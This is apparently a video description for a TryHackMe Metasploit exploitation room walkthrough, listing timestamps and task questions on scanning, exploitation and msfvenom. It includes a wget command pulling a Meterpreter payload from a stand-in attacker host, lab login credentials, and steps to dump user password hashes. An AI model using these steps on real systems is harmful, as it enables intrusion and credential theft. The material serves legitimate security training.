TryHackMe Metasploit: Exploitation | Full Walkthrough 2026
Using Metasploit for scanning, vulnerability assessment and exploitation. πππ Room link: https://tryhackme.com/room/metasploitexploitation/ ππ The topics we will cover are: ππ π± How to scan target systems using Metasploit. π± How to use the Metasploit database feature. π± How to use Metasploit to conduct a vulnerability scan. π± How to use Metasploit to exploit vulnerable services on target systems. π± How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system. [Timestamps] [00:00:00] Task 1: Introduction [00:01:12] Task 2: Scanning [00:11:38] Task 3: The Metasploit Database [00:19:46] Task 4: Vulnerability Scanning [00:22:15] Task 5: Exploitation [00:35:27] Task 6: Msfvenom [00:53:53] Task 7: Summary ππ Room Tasks: ππ π§ Task 1: Introduction π§ Task 2: Scanning - How many ports are open on the target system? - Using the relevant scanner, what NetBIOS name can you see? - What is running on port 8000? - What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. π§ Task 3: The Metasploit Database π§ Task 4: Vulnerability Scanning π§ Task 5: Exploitation - Exploit one of the critical vulnerabilities on the target VM - What is the content of the flag.txt file? - What is the NTLM hash of the password of the user "pirate"? π§ Task 6: Msfvenom - Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier. - Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice). - Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine). - Get a meterpreter session on the target machine. - Use a post exploitation module to dump hashes of other users on the system. - What is the other user's password hash? π§ Task 7: Summary β οΈ Educational Purpose Only This content is for educational and authorized penetration testing purposes only. Always ensure you have permission before testing on any systems. Don't forget to π LIKE and π SUBSCRIBE for more cybersecurity tutorials! #tryhackme
Download
0 formatsNo download links available.